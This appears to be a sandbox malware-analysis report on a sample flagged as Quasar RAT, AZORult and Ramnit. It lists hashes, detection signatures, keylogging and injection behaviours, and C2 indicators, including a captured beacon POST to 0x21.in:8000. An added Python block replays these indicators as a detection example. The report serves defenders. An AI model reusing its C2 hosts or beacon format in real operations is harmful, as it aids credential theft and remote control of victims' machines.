Windows Analysis Report CVbJSUXraQ

Overview

General Information

Sample Name: CVbJSUXraQ (renamed file extension from none to exe)
Analysis ID: 492794
MD5: b0b78da613422be0de8de2e2a2d0ce68
SHA1: a1aea30e16b3bbf15baf1fbb78499adcc5e11d97
SHA256: efacb905cbe59645ce57ea6ac46d32add5f48278aefd411bf4f53116ca0fb0e0
Tags: exe, QuasarRAT

Detection

AZORult, Quasar, Ramnit
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Icon mismatch, binary includes an icon from a different legit application in order to fool users
Yara detected Azorult Info Stealer
Antivirus detection for dropped file
Yara detected Quasar RAT
Yara detected Azorult
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
Detected AZORult Info Stealer
Yara detected Ramnit VNC Module
Antivirus / Scanner detection for submitted sample
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for dropped file
Contains VNC / remote desktop functionality (version string found)
Maps a DLL or memory area into another process
Uses known network protocols on non-standard ports
Binary is likely a compiled AutoIt script file
Allocates memory in foreign processes
May check the online IP address of the machine
Injects a PE file into a foreign process
Sigma detected: Suspicious Svchost Process
Contains functionality to inject code into remote processes
Hides that the sample has been downloaded from the Internet (zone.identifier)
Found many strings related to Crypto-Wallets (likely being stolen)
Uses schtasks.exe or at.exe to add and modify task schedules
Writes to foreign memory regions
.NET source code references suspicious native API functions
Machine Learning detection for dropped file
AutoIt script contains suspicious strings
Modifies the context of a thread in another process (thread injection)
Antivirus or Machine Learning detection for unpacked file
Contains functionality to query locale information (e.g. system language)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to simulate keystroke presses
Contains long sleeps (>= 3 min)
Abnormal high CPU Usage
PE file contains strange resources
Drops PE files
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Yara detected Keylogger Generic
Contains functionality to retrieve information about pressed keystrokes
Checks for available system drives (often done to infect USB drives)
Creates a process in suspended mode (likely to inject code)
Contains functionality to read data from the clipboard
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to shutdown / reboot the system
Contains functionality to query CPU information (cpuid)
Found potential string decryption / allocating functions
Yara detected Credential Stealer
Contains functionality to check if a debugger is running (OutputDebugString,GetLastError)
Contains functionality to call native functions
Contains functionality to read the clipboard data
Contains functionality which may be used to detect a debugger (GetProcessHeap)
PE file contains executable resources (Code or Archives)
Enables debug privileges
Sample file name is different from the original file name gathered from version info
PE file contains an invalid checksum
Extensive use of GetProcAddress (often used to hide API calls)
Detected TCP or UDP traffic on non-standard ports
Contains functionality to launch a program with higher privileges
Potential key logger detected (key state polling based)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

AV Detection:

Antivirus detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\windef.exe Avira: detection malicious, Label: TR/AD.Xiclog.nmpoi
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Avira: detection malicious, Label: TR/Spy.Agent.zgvfh
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Avira: detection malicious, Label: TR/AutoIt.tyemd
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe Avira: detection malicious, Label: TR/AD.Xiclog.nmpoi
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Avira: detection malicious, Label: TR/Hijacker.W
Yara detected Quasar RAT
Source: Yara match File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match File source: 6.0.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.CVbJSUXraQ.exe.ee5bac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.CVbJSUXraQ.exe.ee9fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CVbJSUXraQ.exe.f14fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.5ce01cc.5.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.SystemPropertiesPerformance.exe.ba4fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.CVbJSUXraQ.exe.f14fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.SystemPropertiesPerformance.exe.b79fac.2.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.CVbJSUXraQ.exe.178a8e0.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.CVbJSUXraQ.exe.f14fac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.windef.exe.f10000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.CVbJSUXraQ.exe.ee5bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.2.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.5d0f5cc.7.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000000.745828436.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000000.783293959.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000000.724863626.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000013.00000002.754022001.0000000000DF2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.684577030.000000000176B000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000000.706677041.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000012.00000002.732311496.00000000003F2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.785992209.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.707649613.0000000000F12000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000D.00000002.938115894.0000000000882000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000000.668699670.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000000.695543942.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000000.790493423.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.784574167.00000000018F6000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000003.686395578.0000000001805000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000002.737013238.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000003.776479918.000000000184E000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000001.00000002.939820117.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000017.00000002.797076892.0000000000AA2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000003.698706571.0000000001637000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000007.00000002.939563903.0000000000E77000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000E.00000000.708127388.00000000001B2000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 00000018.00000002.796549316.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: 0000000A.00000002.938805237.0000000000B07000.00000002.00020000.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: CVbJSUXraQ.exe PID: 7128, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: windef.exe PID: 5848, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: CVbJSUXraQ.exe PID: 4112, type: MEMORYSTR
Source: Yara match File source: Process Memory Space: SystemPropertiesPerformance.exe PID: 6424, type: MEMORYSTR
Source: Yara match File source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\AppData\Local\Temp\windef.exe, type: DROPPED
Source: Yara match File source: dropped/windef.exe, type: DROPPED
Source: Yara match File source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe, type: DROPPED
Multi AV Scanner detection for submitted file
Source: CVbJSUXraQ.exe Virustotal: Detection: 73%
Source: CVbJSUXraQ.exe Metadefender: Detection: 68%
Source: CVbJSUXraQ.exe ReversingLabs: Detection: 86%
Antivirus / Scanner detection for submitted sample
Source: CVbJSUXraQ.exe Avira: detected
Multi AV Scanner detection for domain / URL
Source: http://0x21.in:8000/_az/ Virustotal: Detection: 5%
Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Virustotal: Detection: 83%
Source: C:\Users\user\AppData\Local\Temp\vnc.exe ReversingLabs: Detection: 93%
Source: C:\Users\user\AppData\Local\Temp\windef.exe Virustotal: Detection: 85%
Source: C:\Users\user\AppData\Local\Temp\windef.exe ReversingLabs: Detection: 93%
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe ReversingLabs: Detection: 93%
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Local\Temp\windef.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe Joe Sandbox ML: detected
Source: C:\Users\user\AppData\Local\Temp\vnc.exe Joe Sandbox ML: detected
Antivirus or Machine Learning detection for unpacked file
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack Avira: Label: TR/Hijacker.W
Source: 10.0.SystemPropertiesPerformance.exe.a40000.0.unpack Avira: Label: TR/AD.Xiclog.nmpoi
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack Avira: Label: TR/Hijacker.W
Source: 10.2.SystemPropertiesPerformance.exe.a40000.0.unpack Avira: Label: TR/AD.Xiclog.nmpoi
Source: 4.0.vnc.exe.ab0000.0.unpack Avira: Label: TR/Hijacker.Gen
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack Avira: Label: TR/Hijacker.W
Source: 7.2.CVbJSUXraQ.exe.db0000.1.unpack Avira: Label: TR/AD.Xiclog.nmpoi
Source: 4.2.vnc.exe.ab0000.0.unpack Avira: Label: TR/Hijacker.Gen
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack Avira: Label: TR/Hijacker.W
Source: 7.0.CVbJSUXraQ.exe.db0000.0.unpack Avira: Label: TR/AD.Xiclog.nmpoi
Source: 1.3.CVbJSUXraQ.exe.3800000.6.unpack Avira: Label: TR/AD.MoksSteal.elw
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack Avira: Label: TR/Hijacker.W
Source: 1.2.CVbJSUXraQ.exe.db0000.0.unpack Avira: Label: TR/AD.Xiclog.nmpoi
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack Avira: Label: TR/Hijacker.W
Source: 1.0.CVbJSUXraQ.exe.db0000.0.unpack Avira: Label: TR/AD.Xiclog.nmpoi
Source: 10.3.SystemPropertiesPerformance.exe.14d0000.4.unpack Avira: Label: TR/AD.MoksSteal.elw

Cryptography:

Uses Microsoft's Enhanced Cryptographic Provider
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C6A9BC CryptQueryObject,GetLastError,CryptMsgGetParam,CryptMsgGetParam,GetLastError,CertFindCertificateInStore,GetLastError,lstrcmpA,CryptDecodeObject,GetLastError,CryptDecodeObject,GetLastError,CertFreeCertificateContext,CertCloseStore,CryptMsgClose, 5_2_00C6A9BC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0040A610 CryptUnprotectData,LocalFree, 7_2_0040A610

Compliance:

Uses 32bit PE files
Source: CVbJSUXraQ.exe Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
Source: Binary string: ntdll.pdb source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp
Source: Binary string: ntdll.pdbUGP source: vnc.exe, 00000004.00000003.715734553.0000000003530000.00000004.00000001.sdmp

Spreading:

Checks for available system drives (often done to infect USB drives)
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: z:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: x:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: v:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: t:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: r:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: p:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: n:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: l:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: j:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: h:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: f:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: b:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: y:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: w:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: u:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: s:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: q:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: o:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: m:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: k:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: i:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: g:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: e:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: c:
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe File opened: a:
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 1_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose, 1_2_00E1445A
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C7FDA0 memset,lstrlenW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrcatW,memset,FindFirstFileW,lstrcmpW,lstrcmpW,lstrcpyW,lstrcatW,lstrcatW,lstrcpyW,lstrcatW,lstrcatW,DeleteFileW,FindNextFileW,FindClose,lstrcpyW,lstrcatW,lstrcatW,memset,RemoveDirectoryW, 5_2_00C7FDA0
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C76554 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,memset,FindFirstFileW,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,SetLastError,FindNextFileW,FindClose,SetLastError, 5_2_00C76554
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C7FFA8 memset,lstrlenW,HeapAlloc,lstrcpyW,lstrcatW,lstrlenW,HeapAlloc,lstrcpyW,CreateDirectoryW,GetLastError,FindFirstFileW,GetLastError,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,HeapFree, 5_2_00C7FFA8
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00E1445A GetFileAttributesW,FindFirstFileW,FindClose, 7_2_00E1445A
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00413030 FindFirstFileW,FindNextFileW,FindClose, 7_2_00413030
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_004119A8 FindFirstFileW,FindNextFileW,FindClose, 7_2_004119A8
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_004119AC FindFirstFileW,FindNextFileW,FindClose, 7_2_004119AC
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00412D6C FindFirstFileW,FindNextFileW,FindClose, 7_2_00412D6C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_0041160C FindFirstFileW,FindNextFileW,FindClose, 7_2_0041160C
Source: C:\Users\user\Desktop\CVbJSUXraQ.exe Code function: 7_2_00413F58 FindFirstFileW,GetFileAttributesW,FindNextFileW,FindClose, 7_2_00413F58
Source: C:\Users\user\btpanui\SystemPropertiesPerformance.exe Code function: 10_2_00AA445A GetFileAttributesW,FindFirstFileW,FindClose, 10_2_00AA445A

Networking:

Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 8000
May check the online IP address of the machine
Source: C:\Users\user\AppData\Local\Temp\windef.exe DNS query: name: ip-api.com
Source: C:\Users\user\AppData\Roaming\SubDir\winsock.exe DNS query: name: ip-api.com
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected:
    POST /_az/ HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
    Host: 0x21.in:8000
    Content-Length: 101
    Cache-Control: no-cache
    Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4c 4e ed 3e 32 ed 3e 3c ed 3e 3d ed 3e 32 ed 3f 4e 8e 49 4c ed 3e 3c ed 3e 38 ed 3e 38 8d 28 39 fa 28 38 8c 4b 4f 8c 28 39 ff 28 39 f9 4e 2f fb 3e 4f ed 3e 32
    Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9LN>2><>=>2?NIL><>8>8(9(8KO(9(9N/>O>2
Source: global traffic HTTP traffic detected:
    GET /json/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
    Host: ip-api.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /json/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
    Host: ip-api.com
    Connection: Keep-Alive
Detected TCP or UDP traffic on non-standard ports
Source: global traffic TCP traffic: 192.168.2.4:49743 -> 50.17.5.224:8000
Source: global traffic TCP traffic: 192.168.2.4:49745 -> 5.8.88.191:8080
Source: CVbJSUXraQ.exe, 00000007.00000002.943097496.0000000003320000.00000004.00000001.sdmp String found in binary or memory: http://0x21.in:8000/_az/
Source: windef.exe String found in binary or memory: http://api.ipify.org/
Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp String found in binary or memory: http://api.ipify.org/3
Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp String found in binary or memory: http://freegeoip.net/xml/
Source: windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com
Source: CVbJSUXraQ.exe, SystemPropertiesPerformance.exe, 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com/json
Source: CVbJSUXraQ.exe, 00000001.00000003.686336521.0000000001887000.00000004.00000001.sdmp, windef.exe, windef.exe, 00000006.00000000.686167876.0000000000F12000.00000002.00020000.sdmp, CVbJSUXraQ.exe, 00000007.00000000.687913717.0000000000E77000.00000002.00020000.sdmp, SystemPropertiesPerformance.exe, 0000000A.00000003.797016218.0000000005C71000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com/json/
Source: windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp String found in binary or memory: http://ip-api.com40l
Source: windef.exe, 00000006.00000002.713962745.00000000033C3000.00000004.00000001.sdmp String found in binary or memory: http://schemas.datacontract.org/2004/07/
Source: windef.exe, 00000006.00000002.713823415.00000000033AC000.00000004.00000001.sdmp String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: CVbJSUXraQ.exe, SystemPropertiesPerformance.exe, 0000000A.00000003.755528047.0000000001869000.00000004.00000001.sdmp String found in binary or memory: https://dotbit.me/a/
Source: unknown DNS traffic detected: queries for: 0x21.in
Source: C:\Windows\System32\svchost.exe Code function: 5_2_00C6B070 socket,connect,setsockopt,send,recv,shutdown,closesocket,HeapFree, 5_2_00C6B070
Source: global traffic HTTP traffic detected:
    GET /json/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
    Host: ip-api.com
    Connection: Keep-Alive
Source: global traffic HTTP traffic detected:
    GET /json/ HTTP/1.1
    User-Agent: Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0
    Host: ip-api.com
    Connection: Keep-Alive
Source: unknown Network traffic detected: HTTP traffic on port 49747 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49747
Source: unknown TCP traffic detected without corresponding DNS query: 5.8.88.191 (23 connections logged)
Source: unknown HTTP traffic detected:
    POST /_az/ HTTP/1.1
    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
    Host: 0x21.in:8000
    Content-Length: 101
    Cache-Control: no-cache
    Data Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 f0 4c 4e ed 3e 32 ed 3e 3c ed 3e 3d ed 3e 32 ed 3f 4e 8e 49 4c ed 3e 3c ed 3e 38 ed 3e 38 8d 28 39 fa 28 38 8c 4b 4f 8c 28 39 ff 28 39 f9 4e 2f fb 3e 4f ed 3e 32
    Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9LN>2><>=>2?NIL><>8>8(9(8KO(9(9N/>O>2
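The network observations in this section (HTTP on a non-standard port, an online IP lookup against ip-api.com, TCP to 5.8.88.191 with no preceding DNS answer, and the POST /_az/ beacon to 0x21.in:8000 with an Internet Explorer 6 User-Agent) can be replayed against connection logs. The block below is an added example and not part of this report: the event layout is an assumed, simplified Zeek/proxy-style record, the events are constructed (the DNS answers for ip-api.com and example.com are TEST-NET-2 placeholders, not real resolutions), and the indicator values are the ones the report lists.

```python
"""Replay of the report's network checks (added example, not report code).

Event layout is an assumed, simplified Zeek/proxy-style dict; the events
are constructed, and the answer IPs for ip-api.com and example.com are
TEST-NET-2 placeholders.  Indicator values are copied from the report.
"""

# Indicators listed in the report above.
C2_DOMAINS = {"0x21.in"}
C2_IPS = {"50.17.5.224", "5.8.88.191"}
IP_CHECK_DOMAINS = {"ip-api.com", "api.ipify.org", "freegeoip.net"}
# User-Agent on the POST /_az/ beacon in the report: an IE 6 string sent
# from a modern host is a mismatch worth flagging on its own.
BEACON_UA = "Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)"
STANDARD_HTTP_PORTS = {80, 443}

FIREFOX_UA = "Mozilla/5.0 (Windows NT 6.3; rv:48.0) Gecko/20100101 Firefox/48.0"

# Constructed, time-ordered events.  "dns" carries name/answer; "conn"
# and "http" carry dst/port, and "http" adds host/method/uri/ua.
SAMPLE_LOG = [
    {"kind": "dns", "name": "0x21.in", "answer": "50.17.5.224"},
    {"kind": "http", "dst": "50.17.5.224", "port": 8000, "host": "0x21.in",
     "method": "POST", "uri": "/_az/", "ua": BEACON_UA},
    {"kind": "conn", "dst": "5.8.88.191", "port": 8080},
    {"kind": "dns", "name": "ip-api.com", "answer": "198.51.100.10"},
    {"kind": "http", "dst": "198.51.100.10", "port": 80, "host": "ip-api.com",
     "method": "GET", "uri": "/json/", "ua": FIREFOX_UA},
    {"kind": "dns", "name": "www.example.com", "answer": "198.51.100.20"},
    {"kind": "http", "dst": "198.51.100.20", "port": 443, "host": "www.example.com",
     "method": "GET", "uri": "/", "ua": FIREFOX_UA},
]


def analyse(events):
    """Return (event_index, finding) pairs, one per triggered check.

    Checks mirror the report: known C2 domain/address, online IP lookup,
    HTTP on a non-standard port, the beacon User-Agent, and TCP to an
    address that no earlier DNS answer in the stream resolved to.
    """
    findings = []
    resolved = set()  # addresses seen in DNS answers so far
    for i, ev in enumerate(events):
        if ev["kind"] == "dns":
            resolved.add(ev["answer"])
            if ev["name"] in C2_DOMAINS:
                findings.append((i, "known C2 domain resolved: " + ev["name"]))
            if ev["name"] in IP_CHECK_DOMAINS:
                findings.append((i, "online IP check, DNS for " + ev["name"]))
            continue
        if ev["dst"] in C2_IPS:
            findings.append((i, "known C2 address: " + ev["dst"]))
        if ev["dst"] not in resolved:
            findings.append((i, "TCP to %s without prior DNS answer" % ev["dst"]))
        if ev["kind"] == "http":
            if ev["port"] not in STANDARD_HTTP_PORTS:
                findings.append((i, "HTTP on non-standard port %d" % ev["port"]))
            if ev["host"] in IP_CHECK_DOMAINS:
                findings.append((i, "online IP check, HTTP to " + ev["host"]))
            if ev["ua"] == BEACON_UA:
                findings.append((i, "beacon User-Agent on %s %s" % (ev["method"], ev["uri"])))
    return findings


if __name__ == "__main__":
    for idx, msg in analyse(SAMPLE_LOG):
        print(idx, msg)
```

The "no prior DNS answer" check is the generic one of the five: the hard-coded address 5.8.88.191:8080 would trip it on a network where the C2 indicators were never loaded, and it needs only DNS and connection logs from the same sensor, ordered by time.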

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Yara detected Keylogger Generic
Source: Yara match File source: CVbJSUXraQ.exe, type: SAMPLE
Source: Yara match File source: 1.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CVbJSUXraQ.exe.ee9fac.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.3.CVbJSUXraQ.exe.178a8e0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 1.0.CVbJSUXraQ.exe.ee5bac.3.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CVbJSUXraQ.exe.f14fac.2.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.5ce45cc.6.unpack, type: UNPACKEDPE
Source: Yara match File source: 4.2.vnc.exe.ab6000.1.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.3.SystemPropertiesPerformance.exe.187c7b0.3.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 7.2.CVbJSUXraQ.exe.ee5bac.4.unpack, type: UNPACKEDPE
Source: Yara match File source: 5.0.svchost.exe.c9ac50.8.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 10.0.SystemPropertiesPerformance.exe.b75bac.1.unpack, type: UNPACKEDPE
